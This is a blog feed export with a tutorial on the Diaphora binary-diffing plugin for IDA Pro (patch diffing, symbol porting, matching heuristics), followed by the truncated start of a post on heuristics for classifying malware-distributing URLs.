<p>The plugin or tool I have more used and the one I liked the most was Zynamics BinDiff. However, after Google bought the company, updates to it are either too slow or non existent (you can check <a href="https://code.google.com/p/zynamics/issues/detail?id=31&can=1&q=bindiff&colspec=ID%20Product%20Type%20Status%20Priority%20Milestone%20Owner%20Summary">this issue</a> and, my favourite, <a href="https://code.google.com/p/zynamics/issues/detail?id=18&can=1&q=bindiff&colspec=ID%20Product%20Type%20Status%20Priority%20Milestone%20Owner%20Summary">this one</a>, where Google people tells to actually patch the binary and that, may be, they can have a real fix for the next week). Also, nobody can be sure Google is not going to finally kill the product making it exclusively a private tool (i.e., only for Google) or simply killing it because they don’t want to support it for a reason (like it killed GoogleCode or other things before). Due to this reason, because I like no current open source plugins for bindiffing and, also, because they lack most of the features that, on my mind, a decent todays binary diffing tool should have, I decided to create one of mine: Diaphora.</p>
<!--more-->
<p>NOTE: If you’re not interested in the non-technical aspect of this project, skip until the “Finding differences in new versions (Patch diffing)” section 😉</p>
<p><strong>Introduction</strong></p>
<p>Diaphora (διαφορά, in Greek “difference”) is a pure python plugin for IDA Pro to perform program comparison, what is often referred as “Binary Diffing”. This plugin is based on all the previous published research and work of Thomas Dullien (aka Halvar Flake) and Rolf Rolles as well as my own research and ideas on this subject. I always found that the bindiff tools did not import enough information from database to database, if at all. For example: I’m a heavy user of structures and enumerations in IDA and I always have to manually import them. This is tedious and I’m lazy. Another problem: sometimes, I perform malware analysis and I want to check the call graph of the malwares: only Zynamics BinDiff does so. Also, many times I need to match functions from x86, x86_64 and ARM binaries interchangeably. The Zynamics plugin works “great” over all, but can fail matching many functions because the compiler used is different, naturally. However, the Hex-Rays decompiler is not typically bothered by such changes and the pseudo-code is rather similar if not 100% equal. So, why not use also the decompiler? And this is (one of the many things) I do: I use both the AST the Hex-Rays decompiler offers and the pseudo-code. It allows me to perform, interchangeably, binary diffing with x86, x86_64 and ARM at levels that are ahead of the current binary diffing tools or plugins.</p>
<p>It isn’t 100% public yet because is in BETA stage, but will be published soon in, likely, GitHub. But, anyway, I think it’s enough talking about dates, what is and what is not, let’s see it in action 😉</p>
<h2 id="finding-differences-in-new-versions-patch-diffing-heading_20_2"><span class="T2">Finding differences in new versions (Patch diffing)</span> {.Heading_20_2}</h2>
<p class="Text_20_body">
In order to use Diaphora we need at least two binary files to compare. I will take as example 2 different versions of the “avast” binary from Avast for Linux x86_64. The files has the following hashes:
</p>
<ol>
<li>
<p class="P10">
<span class="Numbering_20_Symbols">1.</span><span class="T2">ed5bdbbfaf25b065cf9ee50730334998 avast </span><span class="odfLiEnd"> </span>
</p>
</li>
<li>
<p class="P10">
<span class="Numbering_20_Symbols">2.</span><span class="T2">72a05d44b2ac3d7a1c9d2ab5939af782 avast-72a05d44b2ac3d7a1c9d2ab5939af782 </span><span class="odfLiEnd"> </span>
</p>
</li>
</ol>
<p class="P1">
<span class="T2">The file “avast-<hash>” is the previous one and the binary “avast” is the latest version. Launch IDA Pro for 64 bits (idaq64) and open the file “avast-72a05d44b2ac3d7a1c9d2ab5939af782 ”. Once the initial auto-analysis finishes launch Diaphora by either running the script “diaphora.py” or, if it’s installed (i.e., copied in the $IDA_DIR/plugins/ directory), using the Edit → Plugins → Diaphora – Export or diff option. The following dialog will open:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image1.png"><img class="aligncenter size-full wp-image-21931" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image1.png" alt="image1" /></a>
</p>
<p class="P1">
<span class="T2">We only need to care about 2 things:</span>
</p>
1. <p class="P4">
<span class="T2">Field “</span><span class="T4">Export current database to SQLite</span><span class="T2">”. This is the path to the SQLite database that will be created with all the information extracted from the IDA database of this avast binary.</span><span class="odfLiEnd"> </span>
</p>
2. <p class="P4">
<span class="T2">Field “</span><span class="T4">Use the decompiler if available</span><span class="T2">”. If the Hex-Rays decompiler is available and we want to use it, we will leave this check-box marked, otherwise un-check it.</span><span class="odfLiEnd"> </span>
</p>
<p class="P1">
<span class="T2">After correctly selecting the appropriate values, press OK. It will start exporting all the data from the IDA database. When the export process finishes the message “Database exported.” will appear in the IDA’s Output Window. </span>Now, close this database, save the changes and open the “avast” binary. Wait until the IDA’s auto-analysis finishes and, after it, run Diaphora like with the previous binary file. This time, we will select in the 2nd field, the one named “Open SQLite database to diff”, the path to the .sqlite file we just exported in the previous step, as shown in the next figure:
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21933" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image2.png" alt="image2" />
</p>
<p class="P1">
After this, press the OK button, as we will use the default options. It will first export the current IDA database to the SQLite format as understood by Diaphora and, then, right after finishing, compare both databases. It will show an IDA’s wait box dialog with the current heuristic being applied to match functions in both databases as shown in the next figure:
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21935" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image3.png" alt="image3" />
</p>
<p class="P1">
<span class="T2">After a while a set of lists (choosers, in the HexRays workers language) will appear:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image4.png"><img class="aligncenter size-full wp-image-21938" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image4.png" alt="image4" /></a>
</p>
<p class="P1">
<span class="T2">There is one more list that is not shown for this database, the one named “Unreliable matches”. This list holds all the matches that aren’t considered reliable. However, in the case of this binary with symbols, there isn’t even a single unreliable result. There are, however, unmatched functions in both the primary (the latest version) and the secondary database (the previous version):</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image5.png"><img class="aligncenter size-full wp-image-21940" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image5.png" alt="image5" /></a>
</p>
<p class="P1">
<span class="T2">The previous image shows the functions not matched in the secondary database, that is: the functions removed in the latest version. The second figure shows the functions not matched in the previous database, the new functions added:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image6.png"><img class="aligncenter size-full wp-image-21942" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image6.png" alt="image6" /></a>
</p>
<p class="P1">
<span class="T2">It seems they added various functions to check for SSE, AVX, etc… Intel instructions. Also, they added 2 new functions called handler and context. Let’s take a look now to the “Best matches” tab opened:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image7.png"><img class="aligncenter size-full wp-image-21944" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image7.png" alt="image7" /></a>
</p>
<p class="P1">
<span class="T2">There are many functions in the “Best matches” tab, 2556 functions, and in the primary database there are 2659 functions. The results shown in the “Best matches” tab are these functions matched with some heuristic (like “100% equal”, where all attributes are equal, or “Equal pseudo-code”, where the pseudo-code generated by the decompiler is equal) that, apparently, doesn’t have any difference at all. If you’re diffing these binaries to find vulnerabilities fixed with a new patch, just skip this tab, you will be more interested in the “Partial matches” one 😉 In this tab we have many more results:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image8.png"><img class="aligncenter size-full wp-image-21946" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image8.png" alt="image8" /></a>
</p>
<p class="P1">
<span class="T2">It shows the functions matched between both databases and, in the description field, it says which heuristic matched and the ratio of differences. If you’re looking for functions where a vulnerability was likely fixed, this is where you want to look at. It seems that the function “handle_scan_item”, for example, was heavily modified: the ratio is 0.49, so it means that more than the 49% of the function differs between both databases. Let’s see the differences: we can see then in an assembly graph, in plain assembly or we can diff pseudo-code too. Right click on the result and select “Diff assembly in a graph”, the following graph will appear:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image9.png"><img class="aligncenter size-full wp-image-21948" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image9.png" alt="image9" /></a>
</p>
<p class="P1">
<span class="T2">The nodes in yellow colour, are these with only minor changes; pink ones, are these that are either new or heavily modified and the blank ones, the basic blocks that were not modified at all. Let’s diff now the assembly in plain text: go back to the “Partial matches” tab, right click on the function “handle_scan_item” and select “Diff assembly”:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image10.png"><img class="aligncenter size-full wp-image-21951" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image10.png" alt="image10" /></a>
</p>
<p class="P1">
<span class="T2">It shows the differences, in plain assembly, that one would see by using a tool like the Unix command “diff”. We can also dif the pseudo-code; go back to the “Partial matches” tab, right click in the function and select “Graph pseudo-code”:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image11.png"><img class="aligncenter size-full wp-image-21953" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image11.png" alt="image11" /></a>
</p>
<p class="P1">
<span class="T2">As we can see, it shows all the differences in the pseudo-code in a 2 sides diff, like with the assembly diff. After you know how the 3 different ways to see differences work, you can choose your favourite or use all of the 3 for each specific case. Indeed, I use the 3 depending on each kind of change I’m looking for.</span>
</p>
## <span class="T2">Ignoring small differences: Finding new functionalities</span> {.Heading_20_2}
<p class="P1">
<span class="T2">Sometimes, you don’t need to care about small changes when diffing 2 databases. For example, you maybe finding just the new features added to this or that program instead of finding bugs fixed in a product. We will continue with the previous binaries for this example. Go to the tab “Partial matches” and find the functions “respond” and “scan_reponse”:</span>
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21955" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image12.png" alt="image12" />
</p>
<p class="P1">
<span class="T2">According to the ratios shown it seems these functions are almost equal with small changes. Let’s see the differences for the function “respond”: right click on the respond function and select “Diff pseudo-code”:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image13.png"><img class="aligncenter size-full wp-image-21957" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image13.png" alt="image13" /></a>
</p>
<p class="P1">
<span class="T2">It seems that the only change in this function is, actually, the size of a stack variable and the given size to the “protocol_response” function call. If we’re looking for the new functionality added to the product, it can be irritating going through a big list of small changes (or at least it’s for me). We will re-diff both databases: run again Diaphora by either running diaphora.py or selecting Edit → Plugins → Diaphora – Export or diff and, in the dialog select this time “Relaxed calculations on difference ratios” as shown bellow:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14.png"><img class="aligncenter size-full wp-image-21959" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14.png" alt="image14" /></a>
</p>
<p class="P1">
<span class="T2">Press OK and wait for it to finish. When it’s finished, go to the “Best matches” tab and find the “respond” or “scan_response” functions:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image152.png"><img class="aligncenter size-full wp-image-21994" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image152.png" alt="image15" /></a>
</p>
<p class="P1">
<span class="T2">This time, as we can see, both functions appear in the “Best matches”, the list of functions that are considered equal, so you don’t need to go through a big list with small changes here and there: the “Partial matches” tab will show only functions with bigger changes, making it easier to discover the new functionalities added to the program.</span>
</p>
## <span class="T2">Porting symbols</span> {.Heading_20_2}
<p class="Text_20_body">
One of the most common tasks in reverse engineering, at least from my experience, is porting symbols from previous versions of a program, library, etc… to the new version. It can be quite annoying having to port function names, enumerations, comments, structure definitions, etc… manually to new versions, specially when talking about big reverse engineering projects.
</p>
<p class="P1">
<span class="T2">In the following example, we will import the symbols, structures, enumerations, comments, prototypes, function flags, IDA type libraries, etc… from one version full of symbols to another version with symbols stripped. We will use Busybox 1.21-1, compiled in Ubuntu Linux for x86_64. After downloading and compiling it, we will have 2 different binaries: “busybox” and “busybox_unstripped”. The later, is the version with full symbols while the former is the one typically used for distribution, with all the symbols stripped. Launch IDA and open, first, the “busybox_unstripped” binary containing full symbols. Let’s IDA finish the initial auto-analysis and, after this, run Diaphora by either running diaphora.py or selecting the menu Edit → Plugins → Diaphora – Export or diff. In the dialog just opened, press OK:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-1.png"><img class="aligncenter size-full wp-image-21967" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-1.png" alt="image14-1" /></a>
</p>
<p class="P1">
<span class="T2">Wait until Diaphora finishes exporting to SQLite the current database. When it finishes, close the current IDA database and open the binary “busybox”, wait until IDA finishes the initial auto-analysis and, then, launch again Diaphora. In the next dialog select as the SQLite database to diff the previous one we just created, the one with all the symbols from the previous binary:</span>
</p>
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-2.png"><img class="aligncenter size-full wp-image-21971" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image14-2.png" alt="image14-2" /></a>
<p class="P1">
<span class="T2">Press OK and wait until it finishes comparing both databases. After a while, it will show various tabs with all the unmatched functions in both databases, as well as the “Best”, “Partial” and “Unreliable” matches tabs.</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image18.png"><img class="aligncenter size-full wp-image-21976" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image18.png" alt="image18" /></a>
</p>
<p class="P1">
<span class="T2">As we can see, Diaphora did a decent work matching 796 functions labeled as “Best Matches” and 2296 labeled as “Partial matches”, a total of 3092 functions out of 3134. Let’s go to the “Best matches” tab. All the functions here are these that were matched with a high confidence ratio. Let’s say that we want to import all the symbols for the “Best matches”: right click on the list and select “Import all functions”. It will ask if we really want to do so: press YES. It will import all function names, comments, function prototypes, structures, enumerations and even IDA’s type libraries (TILs). When it’s done it will ask us if we want to relaunch again the diffing process:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image19.png"><img class="aligncenter size-full wp-image-21978" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image19.png" alt="image19" /></a>
</p>
<p class="P1">
<span class="T2">After Diaphora imports symbols it will also update the database with the exported data from the primary database and, as so, with the new information it may be possible to match new functions not discovered before. In this case we will just say “NO” to this dialog. </span>Now, go to the “Partial matches” tab. In this list we have some matches that doesn’t look like good ones:
</p>
<p class="P1">
<img class="aligncenter size-full wp-image-21980" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image20.png" alt="image20" />
</p>
<p class="P1">
<span class="T2">As we can see, the ratios are pretty low: from 0.00 to 0.14. Let’s diff the graphs of the “make_device” function (matched with the “same name” heuristic):</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image21.png"><img class="aligncenter size-full wp-image-21982" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image21.png" alt="image21" /></a>
</p>
<p class="P1">
<span class="T2">It doesn’t look like a good match. And, if it’s, it’s rather big to verify yet. Let’s delete this result: go back to the “Partial matches” tab, select the “make_device” match and, simply, press “DEL”. It will just remove this result. Now, do the same for the next results with 0.00 confidence ratio. OK, bad results removed. Now, it’s time to import all the partial matches: right click in the list and select “Import all data for sub_* functions”. It will import everything for functions that are IDA’s auto-named, these that start with the “sub_” prefix but will not touch any function with a non IDA auto-generated name. It will ask us for confirmation:</span>
</p>
<p class="P1">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image22.png"><img class="aligncenter size-full wp-image-21985" src="http://joxeankoret.com/blog/wp-content/uploads/2015/03/image22.png" alt="image22" /></a>
</p>
<p class="P1">
<span class="T2">Press “Yes”, and wait until it exports everything and updates the primary database. And, that’s all! We just imported everything from function names, comments or prototypes to structures and enumerations and even IDA’s type libraries into the new database and we can just continue with our work with the new database and with all the data imported from the database we used to work on before.</span>
</p>
# <span class="T2">Heuristics</span> {.Heading_20_1}
<p class="P1">
<span class="T2">Diaphora uses multiple heuristics to find matches between different functions. Other competing tools like DarunGrim or TurboDiff implements one, two or a handful of heuristics, with the only exception of Zynamics BinDiff, which implements a lot of heuristics. However, Diaphora is the only one implementing heuristics based on the Hex-Rays decompiler (if it’s available). The following list explains the whole current list of heuristics implemented in Diaphora as of the Release Candidate 1:</span>
</p>
## <span class="T2">Best matches</span> {.Heading_20_2}
* <p class="P5">
<span class="T2">The very first try is to find if everything in both databases, even the primary key values are equals. If so, the databases are considered 100% equals and nothing else is done.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<span class="T1"><strong>Equal pseudo-code</strong>. </span><span class="T3">The pseudo-code generated by the Hex-Rays decompiler are equals. It can match code from x86, x86_64 and ARM interchangeably.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Equal assembly</span></strong><span class="T3">. The assembly of both functions is exactly equal.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Bytes hash and names</span></strong><span class="T3">. The first byte of each assembly instruction is equal and also the referenced true names, not IDA’s auto-generated ones, have the same names.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same address, nodes, edges and mnemonics</span></strong><span class="T3">. The number of basic blocks, their addresses, the number of edges and the mnemonics in both databases are equal</span><span class="odfLiEnd"> </span>
</p>
## <span class="T3">Partial and unreliable matches (according to the confidence’s ratio):</span> {.Heading_20_2}
* <p class="P12">
<strong><span class="T1">Same name</span></strong><span class="T3">. The mangled or demangled name is the same in both functions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same address, nodes, edges and primes (re-ordered instructions)</span></strong><span class="T3">. The function has the same address, number of basic blocks, edges and the prime corresponding to the cyclomatic complexity are equal. It typically matches functions with re-ordered instructions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Import names hash</span></strong><span class="T3">. The functions called from both functions are the same, matched by the demangled names.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity, mnemonics, names, prototype, in-degree and out-degree</span></strong><span class="T3">. The number of basic blocks, mnemonics, names, the function’s prototype the in-degree (calls to the function) and out-degree (calls performed to other functions) is the same.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity, mnemonics, names and prototype</span></strong><span class="T3">. The number of basic blocks, edges, the cyclomatic complexity, the mnemonics, the true names used in the function and even the prototype of the function (stripping the function name) are the same.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Mnemonics and names</span></strong><span class="T3">. The functions have the same mnemonics and the same true names used in the function. It’s done for functions with the same number of instructions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Small names difference</span></strong><span class="T3">. At least 50% of the true names used in both functions are the same.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Pseudo-code fuzzy hash</span></strong><span class="T3">. It checks the normal fuzzy hash (calculated with the DeepToad’s library kfuzzy.py) for both functions.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Pseudo-code fuzzy hashes</span></strong><span class="T3">. It checks all the 3 fuzzy hashes (calculated with the DeepToad’s library kfuzzy.py) for both functions. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Similar pseudo-code</span></strong><span class="T3"><strong>.</strong> The pseudo-code generated by the Hex-Rays decompiler is similar with a confidence ratio bigger or equal to 0.729. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<span class="T1"><strong>Pseudo-code fuzzy AST hash</strong>. </span><span class="T3">The fuzzy hash calculated via SPP (small-primes-product) from the AST of the Hex-Rays decompiled function is the same for both functions. It typically catches C constructions that are re-ordered, not just re-ordered assembly instructions. </span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Partial pseudo-code fuzzy hash</span></strong><span class="T3">. At least the first 16 bytes of the fuzzy hash (calculated with the DeepToad’s library kfuzzy.py) for both functions matches. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same high complexity, prototype and names</span></strong><span class="T3">. The cyclomatic complexity is at least 20, and the prototype and the true names used in the function are the same for both databases.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same high complexity and names</span></strong><span class="T3">. Same as before but ignoring the function’s prototype.</span><span class="odfLiEnd"> </span>
</p>
## <span class="T3">Unreliable matches</span> {.Heading_20_2}
* <p class="P12">
<strong><span class="T1">Bytes hash</span></strong><span class="T3">. The first byte of each instruction is the same for both functions. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity and mnemonics</span></strong><span class="T3">. The number of basic blocks, relations, the cyclomatic complexity (naturally) and the mnemonics are the same. It can match functions too similar that actually perform opposite operations (like add_XXX and sub_XXX). Besides, this is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity and prototype</span></strong><span class="T3">. Same as before but the mnemonics are ignored and only the true names used in both functions are considered. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges, complexity, in-degree and out-degree</span></strong><span class="T3">. The number of basic blocks, edges, cyclomatic complexity (naturally), the number of functions calling it and the number of functions called from both functions are the same. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Nodes, edges and complexity</span></strong><span class="T3">. Same number of nodes, edges and, naturally, cyclomatic complexity values. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Similar pseudo-code</span></strong><span class="T3">. The pseudo-codes are considered similar with a confidence’s ratio of 0.58 or less. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same high complexity</span></strong><span class="T3">. Both functions has the same high cyclomatic complexity, being it at least 50. This is considered a </span><span class="T5">slow heuristic</span><span class="T3">.</span><span class="odfLiEnd"> </span>
</p>
## <span class="T3">Experimental (and likely to be removed or moved or changed in the future):</span> {.Heading_20_2}
* <p class="P12">
<strong><span class="T1">Similar small pseudo-code</span></strong><span class="T3">. The pseudo-code generated by the Hex-Rays decompiler is less or equal to 5 lines and is the same for both functions. It matches too many things and the calculated confidence’s ratio is typically bad.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Small pseudo-code fuzzy AST hash</span></strong><span class="T3">. Same as “Pseudo-code fuzzy AST hash” but applied to functions with less or equal to 5 lines of pseudo-code. Like the previous heuristic, it matches too many things and the calculated confidence’s ratio is typically bad.</span>
</p>
* <p class="P12">
<strong><span class="T1">Similar small pseudo-code</span></strong><span class="T3">. Even worst than “</span><span class="T1">Similar small pseudo-code</span><span class="T3">”, as it tries to match similar functions with 5 or less lines of pseudo-code, matching almost anything and getting confidence’s ratios of 0.25 being lucky.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Equal small pseudo-code</span></strong><span class="T3">. Even worst than before, as it matches functions with the same pseudo-code being 5 or less lines of code long. Typically, you can get 2 or 3 results, that are, actually, wrong.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same low complexity, prototype and names</span></strong><span class="T3">. The prototype of the functions, the true names used in the functions and its cyclomatic complexity, being it less than 20, is the same. It worked for me once, I think.</span><span class="odfLiEnd"> </span>
</p>
* <p class="P12">
<strong><span class="T1">Same low complexity and names</span></strong><span class="T3">. The cyclomatic complexity, being it less than 20, and the true names used in the function are the same. It typically matches functions already matched by other heuristics, so it’s usefulness is really limited.</span><span class="odfLiEnd"> </span>
</p>
## Conclussions {.Heading_20_2}
The plugin is not 100% public yet as it’s finishing its last BETA stage. However, if you’re interested on testing it out before I make it totally public, just send me an [e-mail](http://joxeankoret.com/contact.html) and I will send you the current Release Candidate 1 😉
And that’s all for now! I hope you like this plugin and this blog entry 😉
Cheers!
</hash></span></p>joxeanUPDATE: The plugin is now published in GitHub.Heuristics to detect malware distributed via Web2014-08-19T20:11:01+02:002014-08-19T20:11:01+02:00http://joxeankoret.com/blog/2014/08/19/heuristics-to-detect-malware-distributed-via-web<p>Two years ago I started a project, for fun, to try to catch as much malware and URLs related to malware as possible. I have written about <a href="http://joxeankoret.com/blog/2012/08/25/finding-malware-spam-in-twitter/">this</a> <a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/">before</a>. In this post I’ll explain the heuristics I use for trying to classify URLs as malicious with “Malware Intelligence” (the name of the system that generates the daily <a href="http://malwareurls.joxeankoret.com">Malware URLs feed</a>). What a normal user sees in any of the 2 text files offered are simply domains or URLs that I classified as “malicious”. But, how does “Malware Intelligence” classifies them as malicious? What heuristics, techniques, etc… does it use?</p>
<!--more-->
<p><strong>Malware Intelligence</strong></p>
<p>The server processes in Malware Intelligence take URLs from many sources for later analysis. Some sources are public and others are not. Each URL is put in a queue and, from time to time, a process called “URLAna” performs some checks to determine if the URL seems to be malicious or not. The tool URLAna will call smaller tools that will return a score: a score bigger than 0 means that something was found. A score of 0, nothing bad was found. If after running each mini-tool against the URL or domain its score is bigger than 4, then, the URL is considered “malicious”. I do not use negative scores at all because I consider them a bad idea (for this project).</p>
<p>Both hourly and daily, statistics are gathered about the number of URLs detected, when, how, etc… These statistics and many more features can be seen in the (private) Malware Intelligence’s web page. Let’s see one graphic from the statistics web page about the number of URLs classified as malicious by each heuristic before actually explaining them:</p>
<p><a href="http://joxeankoret.com/wp-content/uploads/2014/08/heur_stats.png"><img class="size-full wp-image-12570" src="http://joxeankoret.com/wp-content/uploads/2014/08/heur_stats.png" alt="Heuristics statistics" /></a></p>
<p class="wp-caption-text">
Statistics for each heuristic used by the Malware Intelligence’s process URLAna.
</p>
<p><strong>Unknown domain</strong></p>
<p>As we can see in the picture, the heuristic that catches more bad URLs is “Unknown domain”: typically ~60% of URLs. This heuristic simply does the following:</p>
<ul>
<li>Download the Alexa’s Top 1 Million domains and save them to a database.</li>
<li>Add (but do not delete) new domains daily.</li>
<li>Possible false positives and manually excluded domains goes also to this table.</li>
<li>When URLAna calls this process I simply check if the domain is in this daily updated table. If it isn’t, I consider it “suspicious” and give back a score of 1.</li>
</ul>
<p>This heuristic doesn’t say that anything is bad. It simply says that “this is unknown and could be bad”. However, in my experience, blocking domains outside the Alexa’s Top 1 Million blocks more than 60% of distributed malware.</p>
<p>And, well, this is how I can “detect” more than half of the malicious URLs Malware Intelligence processes daily. Let’s continue with the next high scoring heuristic: “Thirdy Party Services”.</p>
<p><strong>Thirdy party services</strong></p>
<p>This heuristic uses 3rd party services, as it’s clear from its name. Namely, the following:</p>
<ol>
<li><a href="http://www.surbl.org/">Surbl:</a> Extracted from their web: “<span style="color: #000000;">SURBLs are lists of </span><cite style="color: #000000;">web sites</cite><span style="color: #000000;"> that have appeared in unsolicited messages</span>“. This service offers an API I use to check if the domain is “bad”. If Surbl reports “something” about the URL, a score of 1 is added to the URLs.</li>
<li><a href="http://www.spamhaus.org/">SpamHaus</a>: This is a well known service for downloading long lists of known spammers but, also, they add to the lists malware domains. As with Surbl, it exports an API that I use to check if the domain is considered “bad”. If so, it scores +1.</li>
<li><a href="https://developers.google.com/safe-browsing/">Google Safe Browsing</a>: This is a Google project that let’s you check if one URL or domain is/was considered bad by their own automated malware analysis systems. As with the previous cases, they export an API that I make use of. However, GSB is more focused on malware than in spam and, as so, I add, directly, a score of 4 points if GSB says that something was found for that URL.</li>
</ol>
<p>And that’s all about this easy to implement mini tool. This heuristic is the 2nd one detecting malicious URLs. However, compare the percentages: the “unknown domain” rule detects ~60% of malicious URLs, this one ~15%. Notice the difference? Each time you add a new heuristic to detect more malicious URLs you will discover that the amount of work required for adding only a few ones is huge (and I’m ignoring the fact that there is actually <strong>a lot of work</strong> behind all these 3 services) Don’t believe me? Let’s continue seeing more heuristics, some rather easy and others not <em>that</em> easy and comparing the results…</p>
<p><strong>Obfuscated domain (or URL)</strong></p>
<p>The 3rd one at the podium is this rule. It’s as simply as the following: if the URL or the domain are obfuscated, then its score is increased by 1. Simple, isn’t it? Yes, as soon as you have defined “what is obfuscated” and coded it. In my case, I simply make use of 2 not so complex rules:</p>
<ol>
<li>If there are more than 6 continuous vowels or consonants, I consider it obfuscated. In either the domain, sub-domain or in the URI.</li>
<li>For domains longer than 8 characters if the set with the minimum of either vowels or consonants multiplied by 3 and adding 2 is lower than the total of the other set, I consider it malicious.</li>
</ol>
<p>Complicated? Not so complex when you have 40 million known bad URLs to test with. Hard at first: this is one of the first heuristics I added and one of the more I modified. At first. Why? Let’s take a look to one good URL from Google:</p>
<p>https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm</p>
<p>This (damn) URL is the link for the Web Developer extension for Chrome. One question: do you consider this URL obfuscated or not? I would say yes. Is malicious? No.</p>
<p><strong>Content analysis: packed file</strong></p>
<p>The 4th heuristic(s) at the top is this one. This heuristic, only applied for PE and ELF files analyses with <a href="http://pyew.googlecode.com">Pyew</a> the program (by the way, a URL pointing directly to a program automatically scores +1) and determines if it’s:</p>
<ol>
<li>Packed.</li>
<li>Packed and obfuscated.</li>
</ol>
